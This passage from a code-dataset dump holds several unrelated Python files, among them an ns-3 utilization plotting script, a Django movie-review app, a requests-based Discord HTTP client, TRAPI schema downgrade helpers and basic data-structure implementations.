satisfaction\n","repo_name":"Asr419/rl_recsys","sub_path":"src/rl_recsys/user_modeling/response_model.py","file_name":"response_model.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24724982950","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nroute = '/home/vedantmathur/Downloads/ns-allinone-3.36.1/ns-3.36.1'\n# /home/vedantmathur/Downloads/ns-allinone-3.36.1/ns-3.36.1/CDoS-1Mbps-adhoc-UDP-01/u_0=0.02rho=0.13/nodes_079_000\n\nrho_0 = np.arange(0.02, 1.0, 0.02)\nutilization = np.zeros((49, 41))\nthroughput = np.zeros((49, 41))\n\nfor i in range(len(rho_0)):\n for j in range(1,41):\n node_id = 82 - j*2\n data = np.loadtxt(route + '/CDoS-1Mbps-adhoc-UDP-01/u_0={:.2f}rho=0.13/nodes_{:03d}_000'.format(rho_0[i], node_id),usecols=range(10))\n utilization[i, j] = np.mean(data[150:, 8])\n data = np.loadtxt(route + '/CDoS-1Mbps-adhoc-UDP-01/u_0={:.2f}rho=0.13/nodes_{:03d}_000'.format(rho_0[i], node_id+1),usecols=range(10))\n throughput[i, j] = np.mean(data[150:, 1])\n\nplt.figure(1)\nplt.plot(rho_0, utilization[:, 19], linestyle='-', color='g', linewidth=6)\nplt.plot(rho_0, utilization[:, 39], linestyle=':', color='b', linewidth=6)\nplt.grid(True)\nplt.xlabel('Load at node $A_0$', fontsize=20)\nplt.ylabel('Utilization at node $A_i$', fontsize=20)\nplt.legend(['node $A_{20}$', 'node $A_{40}$'], fontsize=20)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.show()\n\nplt.figure(2)\nplt.plot(range(41), utilization[9, :], linestyle='-', color='r', linewidth=4)\nplt.plot(range(41), utilization[19, :], linestyle='--', color='b', linewidth=4)\nplt.plot(range(41), utilization[29, :], linestyle='-.', color='g', linewidth=4)\nplt.plot(range(41), utilization[39, :], linestyle=':', color='m', linewidth=4)\nplt.grid(True)\nplt.xlabel('Node index $i$', fontsize=20)\nplt.ylabel('Utilization at node $A_i$', fontsize=20)\nplt.xlim([0, 40])\nplt.ylim([0, 0.9])\nplt.legend(['$\\rho_0 = 0.2$', '$\\rho_0 = 0.4$', '$\\rho_0 = 0.6$', '$\\rho_0 = 0.8$'], fontsize=20)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.show()\n","repo_name":"Vedant0616/ns-allinone-3.36.1","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34839009078","text":"import pytorch_lightning as pl\r\nfrom torch.utils.data import DataLoader\r\nimport importlib\r\n\r\n\r\nclass DInterface(pl.LightningDataModule):\r\n def __init__(self, args, split):\r\n super().__init__()\r\n self.args = args\r\n self.split = split\r\n self.module_ = importlib.import_module(\"datasets.\" + self.args.set_name_test)\r\n\r\n def setup(self, stage=None):\r\n\r\n # Assign train/val datasets for use in dataloaders\r\n if stage == \"fit\" or stage is None:\r\n self.trainset = self.module_.set(\r\n self.args, self.split[\"train_keys\"], training=True\r\n )\r\n self.valset = self.module_.set(\r\n self.args, self.split[\"test_keys\"], training=False\r\n )\r\n\r\n if stage == \"test\" or stage is None:\r\n self.testset = self.module_.set(\r\n self.args,\r\n self.split[\"test_keys\"] + self.split[\"train_keys\"],\r\n training=False,\r\n )\r\n\r\n def train_dataloader(self):\r\n return DataLoader(\r\n self.trainset,\r\n batch_size=self.args.batch_size_train,\r\n num_workers=self.args.num_workers,\r\n )\r\n\r\n def val_dataloader(self):\r\n return DataLoader(\r\n self.valset, 
batch_size=self.args.batch_size_val, num_workers=0\r\n        )\r\n\r\n    def test_dataloader(self):\r\n        return DataLoader(\r\n            self.testset, batch_size=self.args.batch_size_val, num_workers=0\r\n        )\r\n","repo_name":"HopLee6/SSPVS-PyTorch","sub_path":"datasets/DS_interface.py","file_name":"DS_interface.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"22185628332","text":"# python David_1_1_detect_face.py -i \"../../../CV_PyImageSearch/Dataset/data/basketball.jpg\"\n\n# Summary : \n    # 1. Detect faces in the image\n    # 2. Save (imwrite) the bounding-box image to a file\n    \n# API : 1. cv2.waitKey(0) # keep the image visible until it is closed manually \n\n\n# 1. import the necessary packages\nimport cv2\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\", required = True, help = \"The path to the image\")\nargs = vars(ap.parse_args())\nimage = cv2.imread(args[\"image\"])\n\n    # Resize\nimage = cv2.resize(image, (500, 400), interpolation=cv2.INTER_CUBIC)\n    ## visualize\ncv2.imshow(\"Faces\", image)\ncv2.waitKey(0)\n\n\n# 2. load our image and convert it to grayscale\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    ## visualize\ncv2.imshow(\"Faces\", gray)\ncv2.waitKey(0)\n\n\n\n# 3. Draw the bounding box\n\n    # 3.1 load the face detector \ndetector = cv2.CascadeClassifier(\"../../../detector/haarcascade.xml\")\n\nprint(detector) \n    # 3.2 detect faces in the image\nrects = detector.detectMultiScale(gray, scaleFactor = 1.3, minNeighbors = 9,\n\tminSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n    # loop over the faces and draw a rectangle surrounding each\nfor (x, y, w, h) in rects:\n\tcv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n    # make a grayscale copy with the bounding boxes drawn\nfor (x, y, w, h) in rects:\n\tcv2.rectangle(gray, (x, y), (x + w, y + h), (0, 255, 0), 3)\n    \n    # visualize\ncv2.imshow(\"Faces\", image)\ncv2.waitKey(0)\ncv2.imshow(\"Faces\", gray)\ncv2.waitKey(0) # visualize the image until it is closed manually\n    # imwrite : Save the converted image\ncv2.imwrite(\"../../data/imwrite/chp1_1/basketball_box.jpg\", image) \ncv2.imwrite(\"../../data/imwrite/chp1_1/basketball_gray_box.jpg\", gray)\n","repo_name":"wcsodw1/Computer-Vision","sub_path":"CV_Pyimage/Module 1 CV Basic Technical/chp_1_0_Detect_face.py/David_1_1_detect_face.py","file_name":"David_1_1_detect_face.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32032647816","text":"\"\"\"TRAPI 1.0.0 to 0.9.2.\"\"\"\nfrom .util import ensure_list, snake_case\n\ndef downgrade_BiolinkEntity(biolink_entity):\n    \"\"\"Downgrade BiolinkEntity from 1.0.0 to 0.9.2.\"\"\"\n    return snake_case(biolink_entity[8:])\n\n\ndef downgrade_BiolinkPredicate(biolink_predicate):\n    \"\"\"Downgrade BiolinkPredicate (1.0.0) to BiolinkRelation (0.9.2).\"\"\"\n    return biolink_predicate[8:]\n\n\ndef downgrade_Node(node, id_):\n    \"\"\"Downgrade Node from 1.0.0 to 0.9.2.\"\"\"\n    new = {\"id\": id_}\n    if node.get(\"category\", None) is not None:\n        new[\"type\"] = [\n            downgrade_BiolinkEntity(node_type)\n            for node_type in ensure_list(node[\"category\"])\n        ]\n    if node.get(\"name\", None) is not None:\n        new[\"name\"] = node[\"name\"]\n    if node.get(\"attributes\", None) is not None:\n        new = {\n            **new,\n            **{\n                attribute.get(\"name\", f\"attribute{idx:02d}\"): attribute[\"value\"]\n                for idx, attribute in enumerate(node[\"attributes\"])\n            }\n        }\n    return new\n\n\ndef downgrade_Edge(edge, id_):\n    
\"\"\"Downgrade Edge from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"id\": id_,\n \"source_id\": edge[\"subject\"],\n \"target_id\": edge[\"object\"],\n }\n if edge.get(\"predicate\", None) is not None:\n new[\"type\"] = downgrade_BiolinkPredicate(edge[\"predicate\"])\n if edge.get(\"relation\", None) is not None:\n new[\"relation\"] = edge[\"relation\"]\n if edge.get(\"attributes\", None) is not None:\n new = {\n **new,\n **{\n attribute.get(\"name\", f\"attribute{idx:02d}\"): attribute[\"value\"]\n for idx, attribute in enumerate(edge.get(\"attributes\", []))\n }\n }\n return new\n\n\ndef downgrade_KnowledgeGraph(kgraph):\n \"\"\"Downgrade KnowledgeGraph from 1.0.0 to 0.9.2.\"\"\"\n return {\n \"nodes\": [\n downgrade_Node(knode, id_)\n for id_, knode in kgraph[\"nodes\"].items()\n ],\n \"edges\": [\n downgrade_Edge(kedge, id_)\n for id_, kedge in kgraph[\"edges\"].items()\n ],\n }\n\n\ndef downgrade_QNode(qnode, id_):\n \"\"\"Downgrade QNode from 1.0.0 to 0.9.2.\"\"\"\n qnode = {**qnode}\n new = {\"id\": id_}\n category = qnode.pop(\"category\", None)\n if category is not None:\n if isinstance(category, list):\n if len(category) > 1:\n raise ValueError(\"QNode with multiple categories is not backwards-compatible\")\n new[\"type\"] = downgrade_BiolinkEntity(category[0])\n else:\n new[\"type\"] = downgrade_BiolinkEntity(category)\n curie = qnode.pop(\"id\", None)\n if curie is not None:\n new[\"curie\"] = curie\n new = {\n **new,\n **qnode,\n }\n return new\n\n\ndef downgrade_QEdge(qedge, id_):\n \"\"\"Downgrade QEdge from 1.0.0 to 0.9.2.\"\"\"\n qedge = {**qedge}\n new = {\n \"id\": id_,\n \"source_id\": qedge.pop(\"subject\"),\n \"target_id\": qedge.pop(\"object\"),\n }\n predicate = qedge.pop(\"predicate\", None)\n if predicate is not None:\n if isinstance(predicate, list):\n if len(predicate) > 1:\n raise ValueError(\"QEdge with multiple predicates is not backwards-compatible\")\n new[\"type\"] = downgrade_BiolinkPredicate(predicate[0])\n else:\n new[\"type\"] = downgrade_BiolinkPredicate(predicate)\n relation = qedge.pop(\"relation\", None)\n if relation is not None:\n new[\"relation\"] = relation\n new = {\n **new,\n **qedge,\n }\n return new\n\n\ndef downgrade_QueryGraph(qgraph):\n \"\"\"Downgrade QueryGraph from 1.0.0 to 0.9.2.\"\"\"\n return {\n \"nodes\": [\n downgrade_QNode(qnode, id_)\n for id_, qnode in qgraph[\"nodes\"].items()\n ],\n \"edges\": [\n downgrade_QEdge(qedge, id_)\n for id_, qedge in qgraph[\"edges\"].items()\n ],\n }\n\n\ndef downgrade_NodeBinding(node_binding, qg_id):\n \"\"\"Downgrade NodeBinding from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"qg_id\": qg_id,\n \"kg_id\": node_binding[\"id\"],\n }\n for key, value in node_binding.items():\n if key == \"id\":\n continue\n new[key] = value\n return new\n\n\ndef downgrade_EdgeBinding(edge_binding, qg_id):\n \"\"\"Downgrade EdgeBinding from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"qg_id\": qg_id,\n \"kg_id\": edge_binding[\"id\"],\n }\n for key, value in edge_binding.items():\n if key == \"id\":\n continue\n new[key] = value\n return new\n\n\ndef downgrade_Result(result):\n \"\"\"Downgrade Result from 1.0.0 to 0.9.2.\"\"\"\n result = {**result}\n new = {\n \"node_bindings\": [],\n \"edge_bindings\": [],\n }\n for qg_id, nbs in result.pop(\"node_bindings\").items():\n new[\"node_bindings\"].extend(\n downgrade_NodeBinding(nb, qg_id)\n for nb in nbs\n )\n for qg_id, ebs in result.pop(\"edge_bindings\").items():\n new[\"edge_bindings\"].extend(\n downgrade_EdgeBinding(eb, qg_id)\n for eb in ebs\n )\n new = {\n **new,\n **result,\n }\n 
return new\n\n\ndef downgrade_Message(message):\n    \"\"\"Downgrade Message from 1.0.0 to 0.9.2.\"\"\"\n    new = dict()\n    if message.get(\"query_graph\", None) is not None:\n        new[\"query_graph\"] = downgrade_QueryGraph(message[\"query_graph\"])\n    if message.get(\"knowledge_graph\", None) is not None:\n        new[\"knowledge_graph\"] = downgrade_KnowledgeGraph(message[\"knowledge_graph\"])\n    if message.get(\"results\", None) is not None:\n        new[\"results\"] = [\n            downgrade_Result(result)\n            for result in message[\"results\"]\n        ]\n    return new\n\n\ndef downgrade_Query(query):\n    \"\"\"Downgrade Query from 1.0.0 to 0.9.2.\"\"\"\n    query = {**query}\n    return {\n        \"message\": downgrade_Message(query.pop(\"message\")),\n        **query,\n    }\n","repo_name":"TranslatorSRI/reasoner-converter","sub_path":"reasoner_converter/downgrading.py","file_name":"downgrading.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6174689254","text":"class Node:\n    def __init__(self, value=None, next_node=None):\n        self.value = value\n        self.next_node = next_node\n\n    def get_value(self):\n        return self.value\n\n    def get_next(self):\n        return self.next_node\n\n    def set_next(self, new_next):\n        self.next_node = new_next\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n        self.tail = None\n\n    def add_to_tail(self, value):\n        new_node = Node(value)\n        if not self.head:\n            self.head = new_node\n            self.tail = new_node\n        else:\n            # link the old tail to the new node before moving the tail pointer\n            self.tail.set_next(new_node)\n            self.tail = new_node\n\n\n    def add_to_head(self, value):\n        new_node = Node(value)\n        if not self.head:\n            self.head = new_node\n            self.tail = new_node\n        else:\n            new_node.next_node = self.head\n            self.head = new_node\n\n\n    def remove_head(self):\n        if self.head:\n            removed_head = self.head\n            self.head = self.head.get_next()\n            if not self.head:\n                # the list is now empty, so the tail must be cleared too\n                self.tail = None\n            return removed_head.value\n\n    def contains(self, value):\n        node_being_searched = self.head #We start by checking the head value\n        while node_being_searched:\n            if node_being_searched.value == value:\n                return True\n            node_being_searched = node_being_searched.get_next() #node to be searched updated to next node\n        return False\n\n    def get_max(self):\n        current_node = self.head\n        if not current_node:\n            return None\n\n        max_value = current_node.value\n\n        while current_node:\n            if current_node.value > max_value:\n                max_value = current_node.value\n\n            current_node = current_node.get_next()\n\n        return max_value\n\n    def display(self):\n        elems = []\n        cur_node = self.head\n        while cur_node:\n            elems.append(cur_node.value)\n            cur_node = cur_node.get_next()\n        print(elems)\n\n\nclass Queue:\n    def __init__(self):\n        self.size = 0\n        self.storage = LinkedList()\n\n    def enqueue(self, item):\n        self.storage.add_to_tail(item)\n        self.size += 1\n\n    def dequeue(self):\n        if self.size == 0:\n            return None\n        self.size -= 1\n        return self.storage.remove_head()\n\n    def len(self):\n        return self.size\n\nclass Stack:\n    def __init__(self):\n        self.size = 0\n        self.storage = LinkedList()\n\n    def push(self, item):\n        self.storage.add_to_head(item)\n        self.size += 1\n\n    def pop(self):\n        if self.size == 0:\n            return None\n        self.size -= 1\n        return self.storage.remove_head()\n\n    def display(self):\n        return self.storage.display()\n\nclass BinarySearchTree:\n    def __init__(self, value):\n        self.value = value\n        self.left = None\n        self.right = None\n\n    def depth_first_for_each(self, cb):\n        stack = Stack()\n        stack.push(self)\n        while stack.size > 0:\n            current_node = stack.pop()\n            if current_node.right:\n            
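# push the right child first so the left child is popped and visited first\n            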
stack.push(current_node.right)\n            if current_node.left:\n                stack.push(current_node.left)\n            cb(current_node.value)\n\n    def breadth_first_for_each(self, cb):\n        # queue = Queue()\n        # queue.enqueue(self)\n\n        queue = []\n        queue.append(self)\n\n        while len(queue) > 0:\n            current_node = queue.pop(0)\n            if current_node.left:\n                queue.append(current_node.left)\n            if current_node.right:\n                queue.append(current_node.right)\n            cb(current_node.value)\n\n    def insert(self, value):\n        new_tree = BinarySearchTree(value)\n        if value < self.value:\n            if not self.left:\n                self.left = new_tree\n            else:\n                self.left.insert(value)\n        elif value >= self.value:\n            if not self.right:\n                self.right = new_tree\n            else:\n                self.right.insert(value)\n\n    def contains(self, target):\n        if self.value == target:\n            return True\n        if self.left:\n            if self.left.contains(target):\n                return True\n        if self.right:\n            if self.right.contains(target):\n                return True\n        return False\n\n    def get_max(self):\n        if not self:\n            return None\n        max_value = self.value\n        current = self\n        while current:\n            if current.value > max_value:\n                max_value = current.value\n            current = current.right\n        return max_value\n\nbst = BinarySearchTree(5)\n\n# bst.insert(2)\n# bst.insert(3)\n# bst.insert(7)\n# bst.insert(9)\n\narr = []\ncb = lambda x: print(x)\n\n# bst.depth_first_for_each(cb)\n\nbst.insert(3)\nbst.insert(4)\nbst.insert(10)\nbst.insert(9)\nbst.insert(11)\nbst.breadth_first_for_each(cb)\n","repo_name":"TheDeterminator/Sprint-Challenge--Data-Structures-Algorithms","sub_path":"data_structures/ex_1/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5995462566","text":"# -*- coding: UTF-8 -*-\nimport matplotlib as mpl \nimport matplotlib.pyplot as plt \nimport pandas as pd \n\n\ndata_train = pd.read_csv('train.csv')\nfont = 'SimHei'\nmpl.rcParams['font.sans-serif'] = [font] # set the default font\n\n\n# effect of having Cabin info on survival\nfig = plt.figure(figsize = (8, 6))\nxlist = [0, 1]\n\n\nplt.title(u\"Effect of Cabin info on survival\")\nplt.yticks([])\nplt.xticks([])\nax1 = fig.add_subplot(121)\ndata_train.Survived[pd.notnull(data_train.Cabin)].value_counts().plot(kind = 'bar')\nplt.legend([u\"Has Cabin info\"])\nplt.plot(xlist)\n\nax2 = fig.add_subplot(122, sharey = ax1)\ndata_train.Survived[pd.isnull(data_train.Cabin)].value_counts().plot(kind = 'bar')\nplt.legend([u\"No Cabin info\"])\n\n\nplt.savefig(u\"effect_of_cabin_info_on_survival\")\nplt.show()","repo_name":"zero1997/Titanic","sub_path":"picture7.py","file_name":"picture7.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74773120486","text":"# suppose we create a dictionary like this -\n\n# empty dictionary\nfound = {}\n\n# adding key values to dictionary\nfound['a'] = 0\nfound['i'] = 0\nfound['e'] = 0\nfound['u'] = 0\nfound['o'] = 0\n\n# printing it will give it in a random order\n# since in dictionaries order might not be preserved\nprint(found)\n\n# so we use sorted(), which returns a sorted list of the keys\nprint(sorted(found))\n\n# it can also be used with loop\nfor k,v in sorted(found.items()):\n    print(k,':',v)","repo_name":"jaikherajani/PythonCodes","sub_path":"head_first/c3p2_sorting_dictionaries.py","file_name":"c3p2_sorting_dictionaries.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"21214460359","text":"from typing import Any, Dict, Optional, Sequence\n
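# a blocking, requests-based take on discord.py's async HTTPClient\n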
from discord.http import Route\nfrom discord import utils, File\nfrom discord.errors import Forbidden, NotFound, DiscordServerError\nfrom .errors import HTTPException\nfrom urllib.parse import quote as _uriquote\nimport sys\nfrom requests.models import Response\nimport requests\nimport json\nimport time\nfrom discord.http import HTTPClient as _HTTPClient\n\n\ndef json_or_text(response: requests.Response):\n    text = response.text\n    try:\n        if response.headers[\"content-type\"] == \"application/json\":\n            return json.loads(text)\n    except KeyError:\n        # Thanks Cloudflare\n        pass\n\n    return text\n\n\nclass HttpClient(_HTTPClient):\n    def __init__(self, token: str, *, session: requests.Session = None):\n        self.token = token\n\n        self.__session = session or requests.Session()\n        # implement locks later # self._locks = weakref.WeakValueDictionary()\n\n        user_agent = \"(https://github.com/Squidtoon99/command-handler {0}) Python/{1[0]}.{1[1]} requests/{2}\"\n        self.user_agent: str = user_agent.format(\n            \"1.0\", sys.version_info, requests.__version__\n        )\n\n    def request(\n        self, route: Route, *, files: Optional[Sequence[File]] = [], **kwargs: Any\n    ):\n        method = route.method\n        url = route.url\n\n        headers: Dict[str, str] = {\"User-Agent\": self.user_agent}\n\n        if self.token is not None:\n            headers[\"Authorization\"] = f\"Bot {self.token}\"\n\n        if \"json\" in kwargs:\n            headers[\"Content-Type\"] = \"application/json\"\n            kwargs[\"data\"] = utils._to_json(kwargs.pop(\"json\")).encode(\"utf8\")\n\n        try:\n            reason = kwargs.pop(\"reason\")\n        except KeyError:\n            pass\n        else:\n            headers[\"X-Audit-Log-Reason\"] = _uriquote(reason, safe=\"/ \")\n\n        kwargs[\"headers\"] = headers\n\n        # TODO: #1 IMPLEMENT PROXY\n        # if self.proxy is not None:\n        #     kwargs[\"proxy\"] = self.proxy\n        # if self.proxy_auth is not None:\n        #     kwargs[\"proxy_auth\"] = self.proxy_auth\n\n        for tries in range(5):\n            if files:\n                for f in files:\n                    f.reset(seek=tries)\n\n            try:\n                response: Response = self.__session.request(method, url, **kwargs)\n\n                data = json_or_text(response)\n                remaining = response.headers.get(\"X-Ratelimit-Remaining\")\n                if remaining == \"0\" and response.status_code != 429:\n                    pass\n                    # we've depleted our current bucket\n                    # delta = utils._parse_ratelimit_header(response, use_clock=self.use_clock)\n                    # # _log.debug('A rate limit bucket has been exhausted (bucket: %s, retry: %s).', bucket, delta)\n                    # maybe_lock.defer()\n                    # self.loop.call_later(delta, lock.release)\n\n                # the request was successful so just return the text/json\n                if 300 > response.status_code >= 200:\n                    return data\n\n                # we are being rate limited\n                if response.status_code == 429:\n                    if not response.headers.get(\"Via\") or isinstance(data, str):\n                        # Banned by Cloudflare more than likely.\n                        raise HTTPException(response, data)\n\n                    fmt = 'We are being rate limited. Retrying in %.2f seconds. Handled under the bucket \"%s\"'\n\n                    # sleep a bit\n                    retry_after: float = data[\"retry_after\"]\n                    # _log.warning(fmt, retry_after, bucket)\n\n                    # check if it's a global rate limit\n                    # is_global = data.get(\"global\", False)\n                    # if is_global:\n                    #     _log.warning(\n                    #         \"Global rate limit has been hit. Retrying in %.2f seconds.\",\n                    #         retry_after,\n                    #     )\n                    #     self._global_over.clear()\n\n                    time.sleep(retry_after)\n                    # _log.debug(\"Done sleeping for the rate limit. 
Retrying...\")\n\n                    # release the global lock now that the\n                    # global rate limit has passed\n                    # if is_global:\n                    #     self._global_over.set()\n                    #     _log.debug(\"Global rate limit is now over.\")\n\n                    continue\n\n                # we've received a 500, 502, or 504, unconditional retry\n                if response.status_code in {500, 502, 504}:\n                    time.sleep(0.5)  # i'm not made of money here\n                    continue\n\n                # the usual error cases\n                if response.status_code == 403:\n                    raise Forbidden(response, data)\n                elif response.status_code == 404:\n                    raise NotFound(response, data)\n                elif response.status_code >= 500:\n                    raise DiscordServerError(response, data)\n                else:\n                    raise HTTPException(response, data)\n\n            # This is handling exceptions from the request\n            except OSError as e:\n                # Connection reset by peer\n                if tries < 4 and e.errno in (54, 10054):\n                    time.sleep(tries * 0.5)\n                    continue\n                raise\n\n        if response is not None:\n            # We've run out of retries, raise.\n            if response.status_code >= 500:\n                raise DiscordServerError(response, data)\n\n            raise HTTPException(response, data)\n\n        raise RuntimeError(\"Unreachable code in HTTP handling\")\n\n    def get_from_cdn(self, url: str) -> bytes:\n        r = self.__session.get(url)\n\n        if r.status_code == 200:\n            return r.content\n        elif r.status_code == 404:\n            raise NotFound(r, \"asset not found\")\n        elif r.status_code == 403:\n            raise Forbidden(r, \"access forbidden\")\n        else:\n            raise HTTPException(r, \"failed getting asset\")\n","repo_name":"Friskytool/command-handler","sub_path":"squid/http/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"8997456786","text":"from django.shortcuts import render, redirect\nfrom .models import Review\n\n# Create your views here.\ndef index(request):\n    reviews = Review.objects.all()\n    rangee = range(len(reviews))\n    context = {\n        'reviews': reviews,\n        'range': rangee,\n    }\n    return render(request, 'movie/index.html', context)\n\ndef write(request):\n    return render(request, 'movie/write.html')\n    \ndef write_sec(request):\n    title = request.GET.get('title')\n    content = request.GET.get('content')\n    star = request.GET.get('star')\n    Review.objects.create(title=title, content=content, star=star)\n    return redirect('movie:index')\n\ndef content(request, pk):\n    review = Review.objects.get(pk=pk)\n    review.hits += 1\n    review.save()\n    context = {\n        'review': review,\n    }\n    return render(request, 'movie/content.html', context)\n\ndef edit(request, pk):\n    review = Review.objects.get(pk=pk)\n    context = {\n        'review': review,\n    }\n    return render(request, 'movie/edit.html', context)\n\ndef edit_sec(request, pk):\n    review = Review.objects.get(pk=pk)\n    title = request.GET.get('title')\n    content = request.GET.get('content')\n    star = request.GET.get('star')\n    review.title = title\n    review.content = content\n    review.star = star\n    review.save()\n    return redirect('movie:index')\n\ndef delete(request, pk):\n    Review.objects.get(pk=pk).delete()\n    return redirect('movie:index')","repo_name":"psun0610/TeamProject_Movie3","sub_path":"pair/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33156669698","text":"\"\"\"Buildings API schemas\"\"\"\nimport marshmallow as ma\nimport marshmallow_sqlalchemy as msa\n\nfrom bemserver_core.model import Building\n\nfrom bemserver_api import AutoSchema, Schema\nfrom bemserver_api.extensions import 
ma_fields\n\n\nclass BuildingSchema(AutoSchema):\n class Meta(AutoSchema.Meta):\n model = Building\n\n id = msa.auto_field(dump_only=True)\n name = msa.auto_field(validate=ma.validate.Length(1, 80))\n\n\nclass BuildingPutSchema(BuildingSchema):\n class Meta(BuildingSchema.Meta):\n exclude = (\"site_id\",)\n\n\nclass BuildingQueryArgsSchema(Schema):\n sort = ma_fields.SortField((\"name\",))\n name = ma.fields.Str()\n campaign_id = ma.fields.Int()\n site_id = ma.fields.Int()\n ifc_id = ma.fields.String()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/buildings/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34658991656","text":"import yql\n\nfrom google.appengine.api import images\n\n\ndef do_yql(query):\n\ty = yql.Public()\n\tresult = y.execute(query)\n\treturn result\n\n\n\ndef get_image_aspect(image):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tif width == height:\n\t\treturn \"square\"\n\telif width > height:\n\t\treturn \"landscape\"\n\telif height > width:\n\t\treturn \"portrait\"\n\n\ndef get_size(image):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\treturn width, height\n\n\ndef check_min_size(image, size):\n\twidth, height = get_size(image)\n\terrors = []\n\tif width < size:\n\t\terrors.append(\"The image you supplied is too thin (needs to be a minimum of \"+ str(size) +\" pixels wide)\")\n\tif height < size:\n\t\terrors.append(\"The image you supplied is not tall enough (needs to be a minimum of \"+ str(size) +\" pixels high)\")\n\treturn errors\n\n\n\ndef resize_image(image, size):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tif width > size and height > size:\n\t\taspect = get_image_aspect(image)\n\t\tif aspect == \"square\":\n\t\t\twidth = size\n\t\t\theight = size\n\t\telif aspect == \"landscape\":\n\t\t\tfactor = height/size\n\t\t\theight = size\n\t\t\twidth = int(width/factor)\n\t\telif aspect == \"portrait\":\n\t\t\tfactor = width/size\n\t\t\twidth = size\n\t\t\theight = int(height/factor)\n\t\timg.resize(width=width, height=height)\n\t\timage = img.execute_transforms(output_encoding=images.JPEG)\t\t\t\n\treturn image\n\n\n\ndef crop_image(image, size):\n\timage = resize_image(image, size)\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tshape = get_image_aspect(image)\n\tif shape == \"square\":\n\t\treturn image\n\telif shape == \"portrait\":\n\t\tleft_x = 0.0\n\t\ttop_y = float((height-size)/2)/float(height)\n\t\tright_x = 1.0\n\t\tbottom_y = float(((height-size)/2) + size)/float(height)\n\telif shape == \"landscape\":\n\t\tleft_x = float((width-size)/2)/float(width)\n\t\ttop_y = 0.0\n\t\tright_x = float(((width-size)/2) + size)/float(width)\n\t\tbottom_y = 1.0\n\timg.crop(left_x, top_y, right_x, bottom_y)\n\tcropimage = img.execute_transforms(output_encoding=images.JPEG)\t\n\treturn cropimage\n\n","repo_name":"christhorpe/bonnier-scraper","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40387946414","text":"from PyQt5.QtWidgets import QFileDialog, QDialog\n\n\nclass FileDialog(QDialog):\n def __init__(self, tt, Ctrl):\n QDialog.__init__(self)\n self.ctrl = Ctrl\n\n if tt == \"Simple\":\n self.comm = self.openFileNameDialog()\n elif tt == 
\"Sequence\":\n self.comm = self.openFileNamesDialog()\n elif tt == \"Save\":\n self.comm = self.saveFileDialog()\n else:\n raise NotImplementedError()\n\n def getComm(self):\n return self.comm\n\n # Individual File.\n def openFileNameDialog(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Load an individual file.\", \"\",\n \"FITS Files (*.fits)\", options=options)\n if fileName:\n comm = \"LOAD \" + fileName\n return comm\n else:\n return None\n\n # Multiple Files.\n def openFileNamesDialog(self):\n\n dir = QFileDialog.getExistingDirectory(self, \"Select a multiple files\")\n if dir:\n comm = \"LOAD \" + dir\n return comm\n else:\n return None\n\n # Save File.\n def saveFileDialog(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save the current file.\", \"\",\n \"Image File (*.png)\", options=options)\n if fileName:\n comm = \"SAVE \" + fileName\n return comm\n else:\n return None\n\n","repo_name":"gabgarar/SunMap","sub_path":"CrossEditorProject/View/QtViews/UtilsPanels/LoadSavePanel.py","file_name":"LoadSavePanel.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"41491626561","text":"#!/usr/bin/env python3.7\n\nimport os\nimport re\nfrom reader import get_traces\nfrom gensim.models import 